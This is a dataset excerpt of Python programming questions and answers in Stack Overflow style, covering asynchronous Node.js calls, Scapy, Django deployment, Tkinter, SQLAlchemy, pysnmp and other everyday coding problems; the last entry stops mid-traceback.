text
stringlengths 226
34.5k
|
---|
How to run a Python script in Node.js synchronously?
Question: I am running the following Python script in Node.js through [python-
shell](https://github.com/extrabacon/python-shell):
import sys
import time
x=0
completeData = "";
while x<800:
crgb = ""+x;
print crgb
completeData = completeData + crgb + "@";
time.sleep(.0001)
x = x+1
file = open("sensorData.txt", "w")
file.write(completeData)
file.close()
sys.stdout.flush()
else:
print "Device not found\n"
And my corresponding Node.js code is:
var PythonShell = require('python-shell');
PythonShell.run('sensor.py', function (err) {
if (err) throw err;
console.log('finished');
});
console.log ("Now reading data");
Output is:
Now reading data
finished
But expected output is:
finished
Now reading data
Node.js can not execute my Python script _synchronously_ , it executes first
all the code following the `PythonShell.run` function then executes
`PythonShell.run`. How can I execute first `PythonShell.run` then the
following code? Any help will be mostly appreciated... It is an emergency
please!
Answer: As this is asynchronous, add an end callback (found in the documentation)
instead of instructions at top level
// end the input stream and allow the process to exit
pyshell.end(function (err) {
if (err) throw err;
console.log ("Now reading data");
});
|
Why does my break call the previous function
Question: I have two functions and the first one calls the second one. However, when I
break out of the second function it displays text from an if statement in the
first function. What I don't understand, is why is the second function calling
the first? Secondly, I do not understand why it would execute code from an if
statement where the condition has never been met.
#! /usr/bin/env python
'''A sorting app where the user gets to choose
between options and the options are ranked by
likes in a file stored on a file'''
import sys
import random
import pickle
def intro():
greeting = '''\nWelcome to chooser where your voice gets to be heard
Press Enter to begin greatness
Press anything else to be immediately banned
>>'''
enter = raw_input(greeting).lower()
if enter == '':
main()
if enter == 'admin':
print 'Entering Admin menu\n'
admin()
else:
print '''\nDid you think I was kidding?!
You're gone!\n'''
sys.exit()
# Enters the main program if the user presses Enter or else it quits
def main():
count = 0
while True:
nav = '''Type Go to play
Type Q to quit
Type admin to go to admin
>>'''
start = raw_input(nav).lower()
if start == 'q':
print '\nThank you for playing\nBye!\n'
break
else:
print 'Any other key restarts the function'
def chooser():
pass
if __name__ == '__main__':
intro()
''' -----Questions-----
Why does this function when it expires run the intro function instead of just
running out of scope????'''
This is what prints out of the terminal:
[![terminal
output](http://i.stack.imgur.com/GwRxF.jpg)](http://i.stack.imgur.com/GwRxF.jpg)
Answer: basically at the part:
if enter == '':
main()
if enter == 'admin':
print 'Entering Admin menu\n'
admin()
else:
print '''\nDid you think I was kidding?!
you have two seperete statements, one 'if' and one 'if-else' following it. the
first checks if the input is '', this condition holds in your example, so
main() is called and everythig is fine. when main() returns, you exit the
first statement and enter the second, which checks if the input is admin (this
is false), and if not it does the printing.
the logic here is:
* if enter is '', run main().
* if enter is 'admin', run admin().
* if enter is not 'admin', print the message.
the else part is not related at all to the first if (only to the second). what
you need to do is to replace the second 'if' with an 'elif', thus making a
single 'if-elif-else' statement, so the logic will be:
* if enter is '', run main().
* if enter is not '', and enter is 'admin', run admin().
* if enter is not '', and not 'admin', print the message.
|
Python Scapy output to txt file
Question: **I would like to output just IP.dst to txt file, But I get all the packet
info including Ether, src, etc**
from scapy.all import *
import time
import os
file = open("newfile.txt","w")
t = '%IP.dst%'
p = sniff(filter="ip", prn=lambda x:x.sprintf(t), count=10)
file.write(str(p))
time.sleep(1)
os.system("cls")
**Sample output of txt file**
> Ether dst=f4:ce:46:5c:bf:f8 src=30:10:b3:24:63:b6 type=0x800 /|IP version=4L
> ihl=5L
Answer: @TeckSupport how about if you set up a function that pulls and writes the
IP.dst:
from scapy.all import *
fob = open("IP.txt","w")
def ip_dst(pkt):
fob.write(pkt[IP].dst+'\n')
sniff(filter='ip',count=10,prn=ip_dst)
fob.close()
Is this what you were looking to do?
|
Create list of list in python
Question: Suppose I have three lists
[-1,0,1,2]
[0,1]
[a,b,c]
I would like to obtain a list as
[-1,0,a]
[-1,0,b]
[-1,0,c]
[-1,1,a]
[-1,1,b]
[-1,1,c]
[0,0,a]
[0,0,b]
[0,0,c]
...
How to write a python function to achieve this goal?
Answer: You can use
[`itertools.product()`](https://docs.python.org/2/library/itertools.html#itertools.product):
from itertools import product
from pprint import pprint
l = [[-1, 0, 1, 2], [0, 1], ['a', 'b', 'c']]
result = list(product(*l))
pprint(result)
Result:
[(-1, 0, 'a'),
(-1, 0, 'b'),
(-1, 0, 'c'),
(-1, 1, 'a'),
(-1, 1, 'b'),
(-1, 1, 'c'),
(0, 0, 'a'),
(0, 0, 'b'),
(0, 0, 'c'),
(0, 1, 'a'),
(0, 1, 'b'),
(0, 1, 'c'),
(1, 0, 'a'),
(1, 0, 'b'),
(1, 0, 'c'),
(1, 1, 'a'),
(1, 1, 'b'),
(1, 1, 'c'),
(2, 0, 'a'),
(2, 0, 'b'),
(2, 0, 'c'),
(2, 1, 'a'),
(2, 1, 'b'),
(2, 1, 'c')]
|
Difference between scikit-learn and sklearn
Question: On OS X 10.11.6 and python 2.7.10 I need to import from sklearn manifold. I
have numpy 1.8 Orc1, scipy .13 Ob1 and scikit-learn 0.17.1 installed.
I used pip to install sklearn(0.0), but when I try to import from sklearn
manifold I get the following:
> Traceback (most recent call last): File "", line 1, in File
> "/Library/Python/2.7/site-packages/sklearn/**init**.py", line 57, in from
> .base import clone File "/Library/Python/2.7/site-packages/sklearn/base.py",
> line 11, in from .utils.fixes import signature File
> "/Library/Python/2.7/site-packages/sklearn/utils/**init**.py", line 10, in
> from .murmurhash import murmurhash3_32 File "numpy.pxd", line 155, in init
> sklearn.utils.murmurhash (sklearn/utils/murmurhash.c:5029) ValueError:
> numpy.dtype has the wrong size, try recompiling.
What is the difference between scikit-learn and sklearn? Also, I cant import
scikit-learn because of a syntax error
Answer: You might need to reinstall numpy. It doesn't seem to have installed
correctly.
`sklearn` is how you type the scikit-learn name in python.
Also, try running the standard tests in scikit-learn and check the output. You
will have detailed error information there.
Do you have `nosetests` installed? Try: `nosetests -v sklearn`. You type this
in bash, not in the python interpreter.
|
How do I make button press first stopping a playing audio file and then playing its own audio?
Question: My problem is, that the audio files under each button are quite lengthy and if
I pressed the wrong button, I would have to wait it to play to end. How can I
make every button press to 1) stop the possible playing audio file and then 2)
play it's own file? I'm using mpg123 to play the audio files and file names
are placeholders.
Code:
#!/usr/bin/env python
import os
from time import sleep
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
GPIO.setup(18, GPIO.IN)
GPIO.setup(19, GPIO.IN)
GPIO.setup(20, GPIO.IN)
GPIO.setup(21, GPIO.IN)
GPIO.setup(22, GPIO.IN)
GPIO.setup(23, GPIO.IN)
GPIO.setup(24, GPIO.IN)
GPIO.setup(25, GPIO.IN)
GPIO.setup(26, GPIO.IN)
GPIO.setup(27, GPIO.IN)
while True:
if (GPIO.input(18)==False):
os.system('mpg123 audio.mp3 &')
if (GPIO.input(19)==False):
os.system('mpg123 audio.mp3 &')
if (GPIO.input(20)==False):
os.system('mpg123 audio.mp3 &')
if (GPIO.input(21)==False):
os.system('mpg123 audio.mp3 &')
if (GPIO.input(22)==False):
os.system('mpg123 audio.mp3 &')
if (GPIO.input(23)==False):
os.system('mpg123 audio.mp3 &')
if (GPIO.input(24)==False):
os.system('mpg123 audio.mp3 &')
if (GPIO.input(25)==False):
os.system('mpg123 audio.mp3 &')
if (GPIO.input(26)==False):
os.system('mpg123 audio.mp3 &')
if (GPIO.input(27)==False):
os.system('mpg123 audio.mp3 &')
sleep(0.1):
Answer: You can use [subprocess](https://docs.python.org/3/library/subprocess.html)
asynchronously so the function call returns immediately. I think it is
possible to get a "handle" object to communicate with the external process
that also allows you to
"[kill](http://stackoverflow.com/questions/16866602/kill-a-running-subprocess-
call)" it.
Similarly, you could check your keys in the main program and start a thread
for playing: <http://docs.python.org/3/library/threading.html> (does not make
much sense as the other program is a new process anyway).
|
Python: count specific occurrences in a dictionary
Question: Say I have a dictionary like this:
d={
'0101001':(1,0.0),
'0101002':(2,0.0),
'0101003':(3,0.5),
'0103001':(1,0.0),
'0103002':(2,0.9),
'0103003':(3,0.4),
'0105001':(1,0.0),
'0105002':(2,1.0),
'0105003':(3,0.0)}
Considering that the first four digits of each key consitute the identifier of
a "slot" of elements (e.g., '0101', '0103', '0105'), how can I count the
number of occurrences of `0.0` for each slot?
The intended outcome is a dict like this:
result={
'0101': 2,
'0103': 1,
'0105': 2}
Apologies for not being able to provide my attempt as I don't really know how
to do this.
Answer: Use a [Counter](https://docs.python.org/2/library/collections.html#counter-
objects), add the first four digits of the key if the value is what you're
looking for:
from collections import Counter
counts = Counter()
for key, value in d.items():
if value[1] == 0.0:
counts[key[:4]] += 1
print counts
|
Sentry django configuration - logger
Question: I am trying to use simple logging and want to send errors/exceptions to
Sentry.
I configured the Sentry as per the document and run the test successfully on
my dev(`python manage.py raven test`)
I added the Logging configuration as in [Sentry
documentation](https://docs.getsentry.com/hosted/clients/python/integrations/django/)
to a Django settings
When I put this code in my View, then it doesn't work at all
import logging
logger = logging.getLogger(__name__)
logger.error('There was an error, with a stacktrace!', extra={
'stack': True,
})
Maybe I am missing something
Thanks for the help
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'root': {
'level': 'WARNING',
'handlers': ['sentry'],
},
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s '
'%(process)d %(thread)d %(message)s'
},
},
'handlers': {
'sentry': {
'level': 'ERROR', # To capture more than ERROR, change to WARNING, INFO, etc.
'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',
'tags': {'custom-tag': 'x'},
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
}
},
'loggers': {
'django.db.backends': {
'level': 'ERROR',
'handlers': ['console'],
'propagate': False,
},
'raven': {
'level': 'DEBUG',
'handlers': ['console'],
'propagate': False,
},
'sentry.errors': {
'level': 'DEBUG',
'handlers': ['console'],
'propagate': False,
},
},
}
Answer: When you call `logger = logging.getLogger(__name__)` Django [creates a new
logger](https://docs.djangoproject.com/ja/1.9/topics/logging/#naming-loggers).
One option is that if you want to log directly to only Sentry, you could use:
logger = logging.getLogger('sentry.errors')
There are many other configurations for loggers as well as inheritance for
loggers on that page in the documentation.
|
why use sqlalchemy declarative api?
Question: New to sqlalchemy and somewhat novice with programing and python. I had wanted
to query a table. It seems I can use the all() function when querying but
cannot filter without creating a class.
1.) Can I filter without creating a class and using the declarative api? Is
the filtering example stated below incorrect? 2.) When would it be appropriate
to use declarative api in sqlalchemy and when would it not be appropriate?
import sqlalchemy as sql
from sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import sessionmaker
db = sql.create_engine('postgresql://postgres:password@localhost:5432/postgres')
engine = db.connect()
meta = MetaData(engine)
session = sessionmaker(bind=engine)
session = session()
files = Table('files',meta,
Column('file_id',Integer,primary_key=True),
Column('file_name',String(256)),
Column('query',String(256)),
Column('results',Integer),
Column('totalresults',Integer),
schema='indeed')
session.query(files).all() #ok
session.query(files).filter(files.file_name = 'test.json') #not ok
Answer: Filter using declarative api this way:
session.query(files).filter(files.file_name == 'test.json').all()
You can also use raw sql queries
([docs](http://docs.sqlalchemy.org/en/latest/core/connections.html#basic-
usage)).
Whether using declarative api or not may depend on your queries complexity,
because sometimes sqlalchemy doesn't optimize them right way.
|
format date 'Fri Apr 15 04_01_33 2016' and '2015-12-16 22-39-28' Using python datetime format date
Question: Here is Simples way to format date using datetime
from datetime import datetime
date = '2016-04-07 04-54-53'
date1 = 'Fri Apr 15 04_01_33 2016'
format = "%Y-%m-%d %H-%M-%S"
format1 = "%a %b %d %H_%M_%S %Y"
datetime = datetime.strptime(date, format)
datetime1 = datetime.strptime(date1, format1)
print(datetime)
print(datetime1)
Output :
2016-04-07 04:54:53
2016-04-15 04:01:33
Answer: **Simples way to format date using datetime**
from datetime import datetime
date = '2016-04-07 04-54-53'
date1 = 'Fri Apr 15 04_01_33 2016'
format = "%Y-%m-%d %H-%M-%S"
format1 = "%a %b %d %H_%M_%S %Y"
datetime = datetime.strptime(date, format)
datetime1 = datetime.strptime(date1, format1)
print(datetime)
print(datetime1)
Output :
2016-04-07 04:54:53
2016-04-15 04:01:33
Vote if you get right ans
|
Cannot see prints with python-tensorflow
Question: I have the following program written in python:
import tensorflow as tf
def main(_): print(something)
if **name** == 'main': tf.app.run()
Either running it with bazel or not, I cannot see the output of print
function. Why?
Answer: I think the problem is with the last line, which should be
if __name__ == '__main__': tf.app.run()
(note: __main__ instead of main)... This code works for me:
import tensorflow as tf
def main(_):
print("something")
if __name__ == '__main__':
tf.app.run()
|
Web Scraping a Forum Post in Python Using Beautiful soup and lxml Cannot get all posts
Question: Im having an issue that is driving me absolutely crazy. I am a newbie to web
scraping, and I am practicing web scraping by trying to scrape the contents of
a forum post, namely the actual posts people made. I have isolated the posts
to what i think contains the text which is div id="post message_ 2793649 (see
attached Screenshot_1 for better representation of the
html)[Screenshot_1](http://i.stack.imgur.com/6L3zf.png)
The example above is just one of many posts. Each post has its own unique
identifier number, but the rest is consistent as div id="post_message_.
here is what I am stuck at currently
import requests
from bs4 import BeautifulSoup
import lxml
r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one- billion-2016-a-120.html')
soup = BeautifulSoup(r.content)
data = soup.find_all("td", {"class": "alt1"})
for link in data:
print(link.find_all('div', {'id': 'post_message'}))
the above code just creates a bunch of empty lists that go down the page its
so frustrating. (See Screenshot_2 for the code that I ran with its output next
to it) [Screenshot_2](http://i.stack.imgur.com/nBcOl.png) What am I missing.
The end result that I am looking for is just all the contents of what people
said contained in a long string without any of the html clutter.
I am using Beautiful Soup 4 running the lxml parser
Answer: There's nothing with the id `post_message`, so `link.find_all` returns an
empty list. You'll first want to grab all of the ids within all the `div`s,
and then filter that list of ids with a regex (e.g.) to get only those that
start with `post_message_` and then a number. Then you can do
for message_id in message_ids:
print(link.find_all('div', {'id': message_id}))
|
simplest python equivalent to R's grepl
Question: Is there a simple/one-line python equivalent to R's `grepl` function?
strings = c("aString", "yetAnotherString", "evenAnotherOne")
grepl(pattern = "String", x = strings) #[1] TRUE TRUE FALSE
Answer: You can use list comprehension:
strings = ["aString", "yetAnotherString", "evenAnotherOne"]
["String" in i for i in strings]
#Out[76]: [True, True, False]
Or use `re` module:
import re
[bool(re.search("String", i)) for i in strings]
#Out[77]: [True, True, False]
Or with `Pandas` (R user may be interested in this library, using a dataframe
"similar" structure):
import pandas as pd
pd.Series(strings).str.contains('String').tolist()
#Out[78]: [True, True, False]
|
How come when I import of two functions from the same module, the import works only for one the two?
Question: **Intro**
I am running a python script on an cluster. I run everything in virtualenv and
in the code I am importing two functions from the same module (written in
SC_module.py):
ex. SC_module.py
def funA():
def funB():
In the script script.py I have the following import
from SC_module import funA,funB
when I run the code on the HPC I get import error funB cannot be found. If I
type
from SC_module import funA
everything works fine. If I run `python3` from the command line and run
from SC_module import funA,funB
everything works and fun(B) is imported.
**Question**
The only difference between funA() and funB() is that have been coded in two
different days.
_NB_ : If I add an new function to the module it will not be loaded when
starting the process but will be imported if I will use the terminal. Is there
something I miss in the loading of the module in the cluster?
Thanks
Answer: Remove file: `SC_module.pyc`, and try run it again.
|
Django: 'BaseTable' object does not support indexing
Question: I'm migrating my project to Django 1.8 and I am receiving an error related to
'johnny cache. Specifically in 'johnny/cache.py/'.
**Error:** lib/python2.7/site-packages/johnny/cache.py", line 87, in
get_tables_for_query tables = set([v[0] for v in getattr(query, 'alias_map',
{}).values()])
**TypeError: 'BaseTable' object does not support indexing**
I have included my code below for the function where the error is originating
from. Advice no whether I should use something other than 'johnny -cache' for
caching would be helpful and/or info as to what is the meaning of this error
and how to fix it. Thank you!
def get_tables_for_query(query):
"""
Takes a Django 'query' object and returns all tables that will be used in
that query as a list. Note that where clauses can have their own
querysets with their own dependent queries, etc.
"""
from django.db.models.sql.where import WhereNode, SubqueryConstraint
from django.db.models.query import QuerySet
tables = set([v[0] for v in getattr(query, 'alias_map', {}).values()])
def get_sub_query_tables(node):
query = node.query_object
if not hasattr(query, 'field_names'):
query = query.values(*node.targets)
else:
query = query._clone()
query = query.query
return set([v[0] for v in getattr(query, 'alias_map',{}).values()])
def get_tables(node, tables):
if isinstance(node, SubqueryConstraint):
return get_sub_query_tables(node)
for child in node.children:
if isinstance(child, WhereNode): # and child.children:
tables = get_tables(child, tables)
elif not hasattr(child, '__iter__'):
continue
else:
for item in (c for c in child if isinstance(c, QuerySet)):
tables += get_tables_for_query(item.query)
return tables
if query.where and query.where.children:
where_nodes = [c for c in query.where.children if isinstance(c, (WhereNode, SubqueryConstraint))]
for node in where_nodes:
tables += get_tables(node, tables)
return list(set(tables))
Answer: Found your problem when I looked a bit further into your library.
From the [Johnny Cache documentation](https://pythonhosted.org/johnny-cache/):
> It works with Django 1.1 thru 1.4 and python 2.4 thru 2.7.
From your question:
> I'm migrating my project to Django 1.8.
In fact, it looks like the library you're using is woefully out of date and no
longer maintained:
> Latest commit d96ea94 on Nov 10, 2014
|
seaborn violin plot, how can I set labels?
Question: I'm plotting a list of vectors as a sequence of violin plots. I'd use a pandas
dataframe, but the lists are unequal lengths.
This works: `python g = sns.violinplot (data=res, cut=0, inner='box') `
where 'res' is a list of lists (each a vector of floats), where each vector
should be turned into a violin. It is.
but the x axis is just labeled '0,1,2...'. Adding the parameter
'names=[0,1,2...]' is silently ignored.
Answer: You can use the `.set_xticklabels()` method:
g = sns.violinplot (data=res, cut=0, inner='box')
g.set_xticklabels(['a','b','c'...])
Example:
import numpy as np, seaborn as sns
res = [i for i in (np.random.randn(3, 25))]
ax = sns.violinplot(data=res, cut=0, inner='box')
ax.set_xticklabels(['a','b','c'])
Results in:
[![enter image description
here](http://i.stack.imgur.com/kB9ue.png)](http://i.stack.imgur.com/kB9ue.png)
|
django deploy - ubuntu 14.04 and apache2
Question: <https://www.sitepoint.com/deploying-a-django-app-with-mod_wsgi-on-
ubuntu-14-04/>
and
<https://www.youtube.com/watch?v=hBMVVruB9Vs>
This was the first time I deploy a website.And these are the tutorials I
followed.
Now I can access to the server(by typing 10.231.XX.XX) from other machine and
see the Apache2 Ubuntu Default Page.
Then I tried to access my django project. I run:
> python manage.py runserver 8000 Validating models...
>
> 0 errors found August 03, 2016 - 09:44:20 Django version 1.6.1, using
> settings 'settings' Starting development server at <http://127.0.0.1:8000/>
> Quit the server with CONTROL-C.
Then I type 10.231.XX.XX:8000 to try to acess the django page. But I failed.
It said:
> This site can’t be reached
>
> 10.231.XX.XX refused to connect. Search Google for 231 8000
> ERR_CONNECTION_REFUSED
I have tried every thing I can but still can't figure why. (as followed the
website <https://www.sitepoint.com/deploying-a-django-app-with-mod_wsgi-on-
ubuntu-14-04/>) I have apache folder in mysite folder, and in override.py:
from mysite.settings import *
DEBUG = True
ALLOWED_HOSTS = ['10.231.XX.XX']
in wsgi.py:
import os, sys
# Calculate the path based on the location of the WSGI script.
apache_configuration= os.path.dirname(__file__)
project = os.path.dirname(apache_configuration)
workspace = os.path.dirname(project)
sys.path.append(workspace)
sys.path.append(project)
# Add the path to 3rd party django application and to django itself.
sys.path.append('/home/zhaojf1')
os.environ['DJANGO_SETTINGS_MODULE'] = '10.231.52.XX.apache.override'
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
and __init__py is empty.
in /etc/apache2/sites-enabled/000-default.conf :
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
WSGIScriptAlias /msa.html /home/zhaojf1/Web-Interaction/apache/wsgi.py
<Directory "/home/zhaojf1/Web-Interaction-APP">
<Files wsgi.py>
Require all granted
</Files>
</Directory>
I have also restart apache after I do everything.
Thanks for help
Answer: The connection refused error is likely going to come down to Apache being
incorrectly configured for the `VirtualHost` or you accessing wrong port. You
also have other basic mistakes in your `wsgi.py` file as well.
Starting with the `wsgi.py` file, the `DJANGO_SETTINGS_MODULE` value is wrong:
os.environ['DJANGO_SETTINGS_MODULE'] = '10.231.52.XX.apache.override'
The value is meant to be a Python module path. Having the IP address in there
looks very wrong and is unlikely to yield what you need.
Next is changes to `sys.path`. The location of your project and activation of
any Python virtual environment is better done through options for mod_wsgi in
the Apache configuration file.
That you are adding a home directory into the path is also a flag to potential
other issues you may encounter. Specifically, the user that Apache runs as
often cannot read into home directories as the home directories are not
readable/accessible to others. You may need to move the project out of your
home directory.
As to the Apache configuration, your `VirtualHost` lacks a `ServerName`
directive. If this was an additional `VirtualHost` you added and not the
default (first one appearing in Apache configuration when parsed), it will be
ignored, with all requests going to the first `VirtualHost`. You do show this
as in the default site file, so may be you are okay.
Even so, that `VirtualHost` is set up to listed on port 80. You are trying to
connect to port 8000, so there wouldn't be anything listening.
Next issue is the `WSGIScriptAlias` line.
WSGIScriptAlias /msa.html /home/zhaojf1/Web-Interaction/apache/wsgi.py
It is strange to have `msg.html` as the mount point as that makes it appear as
if you are accessing a single HTML page, but you have it mapped to a whole
Django project. If you were accessing the root of the host, it also wouldn't
map through to the Django application as you have it mounted at a sub URL.
Thus perhaps need to use:
WSGIScriptAlias / /home/zhaojf1/Web-Interaction/apache/wsgi.py
Next problem is that the directory specified in `Directory` directive doesn't
match where you said the `wsgi.py` file existed in the `WSGIScriptAlias`. They
should match. So maybe you meant:
<Directory /home/zhaojf1/Web-Interaction/apache>
Even then that doesn't look right as where is the `apache` directory coming
from. That last directory in the path should normally be the name of the
Django project.
One final thing, you may need to change `ALLOWED_HOSTS` as well. If you find
you start getting bad request errors it probably doesn't match properly.
Change it to `['*']` to see if that helps.
So lots of little things wrong.
Suggestions are:
* Make sure you read the official Django documentation for setting up mod_wsgi. See <https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/modwsgi/>
* If you are only wanting to do development at this point, use mod_wsgi-express instead. See <http://blog.dscpl.com.au/2015/04/using-modwsgi-express-with-django.html> and <http://blog.dscpl.com.au/2015/04/integrating-modwsgi-express-as-django.html>
|
Python 3 - Tkinter button commands
Question: I am new to Tkinter and Python as well. I have three buttons with commands in
my Tkinter frame. Button 1 calls open_csv_dialog(), opens a file dialog box to
select a .csv file and returns the path. Button 2 calls
save_destination_folder(), opens a file dialog box to open the preferred
directory and return the path.
My problem is with Button 3. It calls modify_word_doc() which needs the
filepaths returned from button 1 and button 2.
I have tried;
button3 = ttk.Button(root, text="Run", command=lambda: modify_word_doc(open_csv_dialog, save_destination_folder)).pack()
but that obviously just prompts the file dialog box to open again for both the
open_csv_dialog() and save_destination_folder() function which is undesired. I
would like to just use the file path that was already returned from these two
functions and pass it into modify_word_doc without being prompted by another
file dialog box. I have also tried to use `partial` but I'm either using it
wrong or it still has the same undesired consequences.
I have read the Tkinter docs about commands and searched SO for a possible
answer, so apologies if this has been answered before and I failed to find it.
import tkinter as tk
from tkinter import filedialog
from tkinter import ttk
import os
import csv
import docx
from functools import partial
root = tk.Tk()
def open_csv_dialog():
file_path = filedialog.askopenfilename(filetypes=(("Database files",
"*.csv"),("All files", "*.*")))
return file_path
def save_destination_folder():
file_path = filedialog.askdirectory()
return file_path
def modify_word_doc(data, location):
#data = open_csv_dialog()
#location = save_destination_folder()
#long code. takes .csv file path opens, reads and modifies word doc with
#the contents of the .csv, then saves the new word doc to the requested
#file path returned from save_destination_folder().
label = ttk.Label(root, text="Step 1 - Choose CSV File.",
font=LARGE_FONT)
label.pack(pady=10, padx=10)
button = ttk.Button(root, text="Choose CSV",
command= open_csv_dialog).pack()
label = ttk.Label(root,
text="Step 2 - Choose destination folder for your letters.",
font=LARGE_FONT)
label.pack(pady=10, padx=10)
button2 = ttk.Button(root, text="Choose Folder",
command=save_destination_folder).pack()
label = ttk.Label(root, text="Step 3 - Select Run.", font=LARGE_FONT)
label.pack(pady=10, padx=10)
button3 = ttk.Button(root, text="Run",
command=lambda: modify_word_doc(open_csv_dialog, save_destination_folder)).pack()
root.mainloop()
Answer: This was probably just an error typing the question.... but for completeness
on this line
button3 = ttk.Button(root, text="Run", command=lambda: modify_word_doc(open_csv_dialog, save_destination_folder).pack()
You're missing the closing parenthesis for `ttk.Button(*)*.pack()`
It should be (syntactically):
button3 = ttk.Button(root, text="Run", command=lambda: modify_word_doc(open_csv_dialog, save_destination_folder)).pack()
Also, using `.pack()` returns `None` so setting a variable to a widget +
geometry manager method just sets that variable to nothing, instead of a
reference to the widget object.
So, if you actually need a reference to this widget you should actually do:
button3 = ttk.Button(*)
button3.pack()
If you don't need a reference then just don't assign anything and save
yourself some typing, since it's redundant.
For the actual question:
If I understand your question, you have two buttons which set the file path of
the .csv and the destination folder. However, since both your functions use
the dialog you are being prompted again even though the may have already been
chosen.
You could use globals and various other ways to do this, I'll set an attribute
on the base root window since i think this is easiest here...
In the below code what I did was simply set an attribute on the `root` window
if the `file_path` has been selected. You can check this with an `if`
statement.
Then on either I call `check_state` to see if the root window has both of
these attributes `getattr(object, string, default)` will return the attribute
or the default if the attribute does not exists. So, by setting the file_path
to the string, or None if the location was re-selected the state will always
be updated correctly.
You can clean this up some more. You could actually make both of those one
function etc if you really wanted to.
import tkinter as tk
from tkinter import filedialog, ttk
def check_state():
if getattr(root, 'csv_path', False) and getattr(root, 'dest_path', False):
button3['state'] = 'normal'
else:
button3['state'] = 'disabled'
def open_csv_dialog():
file_path = filedialog.askopenfilename(
filetypes=(("Database files", "*.csv"), ("All files", "*.*")))
if file_path:
root.csv_path = file_path
else:
root.csv_path = None
check_state()
def save_destination_folder():
file_path = filedialog.askdirectory()
if file_path:
root.dest_path = file_path
else:
root.dest_path = None
check_state()
def modify_word_doc():
print(root.csv_path, root.dest_path)
root = tk.Tk()
ttk.Label(root, text="Step 1 - Choose CSV File.",).pack(pady=10, padx=10)
ttk.Button(root, text="Choose CSV", command= open_csv_dialog).pack()
ttk.Label(root, text="Step 2 - Choose destination folder for your letters.").pack(pady=10, padx=10)
ttk.Button(root, text="Choose Folder", command=save_destination_folder).pack()
ttk.Label(root, text="Step 3 - Select Run.").pack(pady=10, padx=10)
#We need a reference to the widget here, for the state func...
button3 = ttk.Button(root, text="Run", state='disabled', command=modify_word_doc)
button3.pack()
root.mainloop()
|
pysnmp error on specific query
Question: I have been trying to implement code that loads my device MIBS and walks
through all the OIDS. In this one case when I try to load the OID for snmp
1.3.6.1.2.1.11 smi throws an exception when trying to load a specific OID. The
previous OID works successfully: '.1.3.6.1.2.1.11.29.0' but this one generates
the error message '.1.3.6.1.2.1.11.30.0'
The exception is:
> File "/opt/anaconda/lib/python2.7/site-packages/pysnmp/smi/rfc1902.py", line
> 859, in resolveWithMib raise SmiError('MIB object %r having type %r failed
> to cast value %r: %s' % (self.**args[0].prettyPrint(),
> self.__args[0].getMibNode().getSyntax().__class**.**name** , self.__args[1],
> sys.exc_info()[1])) ;SmiError: MIB object
> 'SNMPv2-MIB::snmpEnableAuthenTraps.0' having type 'Integer32' failed to cast
> value Integer32(808466736):
> ConstraintsIntersection(ConstraintsIntersection(ConstraintsIntersection(),
> ValueRangeConstraint(-2147483648, 2147483647)), SingleValueConstraint(1, 2))
> failed at: "SingleValueConstraint(1, 2) failed at: "808466736"" at Integer32
Here is sample code that demonstrates the error. You will need to modify the
DEVICE_IP. It is assuming that you are running SNMP v1 and against community
'public. It is running pysnmp version 4.3.2
from pysnmp.entity.rfc3413.oneliner import cmdgen
from pysnmp.smi.rfc1902 import ObjectIdentity
DEVICE_IP = 'localhost'
def get_oid(oid):
"""
Requires a valid oid as input and retrieves the given OID
"""
snmp_target = (DEVICE_IP, 161)
cmdGen = cmdgen.CommandGenerator()
result = None
errorIndication, errorStatus, errorIndex, varBindTable = cmdGen.nextCmd(
cmdgen.CommunityData('public', mpModel=0),
cmdgen.UdpTransportTarget(snmp_target),
ObjectIdentity(oid, last=True),
lexicographicMode=False
)
if errorIndication:
print(errorIndication)
else:
for varBindTableRow in varBindTable:
for name, val in varBindTableRow:
try:
result = str(val)
except:
raise
return result
# Does not Throw Error
print get_oid('.1.3.6.1.2.1.11.29.0')
# Throws Error
print get_oid('.1.3.6.1.2.1.11.30.0')
Answer: Your SNMP agent responded with _1.3.6.1.2.1.11.30.0=808466736_ while OID
1.3.6.1.2.1.11.30.0 identifies MIB object _snmpEnableAuthenTraps_ of type
INTEGER with only two values permitted: 1 and 2.
Here is formal definition from SNMPv2-MIB:
snmpEnableAuthenTraps OBJECT-TYPE
SYNTAX INTEGER { enabled(1), disabled(2) }
...
So this time pysnmp seems to do the right thing - it shields you from the
value that makes no sense. Root cause of this problem is the SNMP agent that
sends malformed values for MIB objects.
|
Python 2.7 on OS X: TypeError: 'frozenset' object is not callable on each command
Question: I have this error on each my command with Python:
➜ /tmp sudo easy_install pip
Traceback (most recent call last):
File "/usr/bin/easy_install-2.7", line 11, in
load_entry_point('setuptools==1.1.6', 'console_scripts', 'easy_install')()
File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 357, in load_entry_point
return get_distribution(dist).load_entry_point(group, name)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 2394, in load_entry_point
return ep.load()
File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 2108, in load
